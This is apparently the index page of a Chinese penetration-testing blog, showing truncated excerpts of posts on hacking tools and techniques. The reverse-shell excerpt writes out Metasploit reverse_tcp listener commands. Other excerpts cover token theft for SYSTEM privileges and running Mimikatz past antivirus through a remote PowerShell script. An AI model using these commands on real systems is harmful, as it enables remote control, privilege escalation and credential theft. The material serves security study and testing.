News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

The Lastest

常用软件

QQ群成员导出工具

jasonx 7 0

前言:有时候需要对群成员进行管理,或者查询某个人是否在多个群的话,你可能会需要这个工具。更新说明更新时间:2019-06-19版本号:v1.1.0更新内容:修复多个已知错误软件功能登录后可以选择导出指定的群成员列表,可以导出为txt或者excel格式。软件截图下载地址文件名称: QQ群成员导出工具.exe文件大小: 600 KB (614,400 字节)文件版本: 1.1.0.0修改时间: 2019年06月19日,21:29:56...

攻防软件,常用软件

旁站查询工具下载

jasonx 21 0

前言:现在旁站查询的接口越来越少了,好不容易找到一个速度还算不错的接口,所以写了个工具。软件截图软件信息文件名称: 旁站查询工具.exe文件大小: 390 KB (399,360 字节)文件版本: 1.0.0.0修改时间: 2019年06月17日,16:42:45MD5: 9F29DF7B1017A56666229BA58E6E47B4下载地址蓝奏云盘https://www.lanzous.com/i4lqv4b

漏洞研究,攻防软件

CVE-2019-0708漏洞检测工具

jasonx 66 0

前言git上已经有很多检测脚本了,但是GUI的目前没看到,所以就抽空写了一个。软件采用了360官方发布的检测程序,我在该程序上进行了改进。更新说明更新时间:2019-06-08版本号:v1.1.0更新内容:修复扫描成功的总数错误问题软件截图使用说明自己整理好要扫描的ip,一行一个ip。如下;192.168.1.1:3389 或者 192.168.1.1就行导入软件开始扫描就行了。使用ip段扫描的话,建议扫c段就行了,否则生成大量i...

渗透测试,漏洞研究

Token获取与利用

jasonx 62 0

0x01 简介本文将要介绍以下内容;·Token简介·Metasploit中的incognito·Windows平台下的incognito·Invoke-TokenManipulation.ps1用法·利用token获得system权限·利用token获得TrustedInstaller权限0x02 Token简介Windows有两种类型的Token:·Delegation token(授权令牌):用于交互会话登录(例如本地用户直...

渗透测试,网络技术

powershell反弹shell的几种方法

jasonx 55 0

0x00 nc反弹如果想接收多个sessions的话,用msf执行以下命令监听。反弹成功以后,用sessions id 来选择要操作的目标。msfconsole use exploit/multi/handler set payload windows/shell/reverse_tcp set lhost 192.168.1.33 set lport 888 run -j #如果只接收一个sessions的话,直接执行以下命令...

渗透测试,网络技术

九种姿势运行Mimikatz

jasonx 98 0

前言平时收集的一些姿势,用户绕过杀软执行mimikatz,这里以360为例进行bypass 测试。下载最新版360:未经处理的mimikatz直接就被杀了下面开始进行绕过360抓密码姿势一-powershellhttps://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1cmd下执行C:\Users\test\De...